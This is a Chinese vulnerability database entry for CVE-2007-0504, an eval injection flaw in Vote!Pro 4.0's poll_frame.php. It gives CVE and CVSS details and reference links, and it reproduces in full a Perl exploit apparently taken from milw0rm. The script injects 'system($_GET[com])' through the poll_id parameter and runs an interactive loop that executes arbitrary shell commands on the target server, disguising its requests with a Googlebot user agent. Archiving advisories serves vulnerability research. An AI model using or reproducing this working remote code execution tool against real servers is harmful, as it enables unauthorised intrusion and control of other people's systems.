Vote! Pro 'poll_frame.php' eval注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112064 漏洞类型 未知
发布时间 2007-01-23 更新时间 2007-01-25
CVE编号 CVE-2007-0504 CNNVD-ID CNNVD-200701-444
漏洞平台 PHP CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/3180
https://www.securityfocus.com/bid/83559
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-444
|漏洞详情
Vote!Pro4.0以及可能其他脚本的poll_frame.php中存在eval注入漏洞。远程攻击者可以借助poll_id参数,执行任意代码。该参数会提供给eval函数调用。
|漏洞EXP
#################################################################################################
#                                    r0ut3r Presents...                                         #
#                                                                                               #
#                                Another r0ut3r discovery!                                      #
#                                  writ3r [at] gmail.com                                        #
#                                                                                               #
#                          Vote-Pro Code Injection 0day Exploit                                 #
#################################################################################################
# Software: Vote-Pro 4.0                                                                        #
#                                                                                               #
# Vendor: http://www.vote-pro.com/                                                              #
#                                                                                               #
# Released: 2007/01/23                                                                          #
#                                                                                               #
# Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com)                                       #
#                                                                                               #
# Note: The information provided in this document is for Vote-Pro administrator                 #
# testing purposes only!                                                                        #
#################################################################################################

use IO::Socket;

$port = "80"; # connection port
$target = shift; # vote-pro.com
$folder = shift; # /votepro/

sub Header()
{
	print q
	{Vote-Pro Code Injection Exploit - writ3r [at] gmail.com
-------------------------------------------------------
};
}

sub Usage()
{
	print q
	{
Usage: votecmd.pl [target] [directory]
Example: votecmd.pl vote-pro.com /votepro/
};
	exit();
}

Header();

if (!$target || !$folder) {
	Usage(); }

print "[+] Connecting...\n";
$cmd = "dir";
while ($cmd !~ "exit")
{
	$xpack = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect on exploit attempt. Exiting...\r\n";
	print $xpack "GET ".$folder."poll_frame.php?poll_id=hyphy;system($_GET[com]);&com=".substr($cmd, 0, -1)."; HTTP/1.1\n";
	print $xpack "Host: $target\n";
	print $xpack "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
	print $xpack "Accept: text/html\n";
	print $xpack "Connection: keep-alive\n\n";

	print "[cmd]\$ ";
	$cmd = <STDIN>;
	$cmd =~ s/ /%20/g;
}

print "[!] Connection to host lost...\n";

# milw0rm.com [2007-01-23]
|受影响的产品
Vote Pro Vote Pro 4.0
|参考资料

来源:MILW0RM
名称:3180
链接:http://www.milw0rm.com/exploits/3180
来源:VUPEN
名称:ADV-2007-0300
链接:http://www.frsirt.com/english/advisories/2007/0300
来源:SECUNIA
名称:23834
链接:http://secunia.com/advisories/23834
来源:OSVDB
名称:31606
链接:http://osvdb.org/31606
来源:MILW0RM
名称:3180
链接:http://milw0rm.com/exploits/3180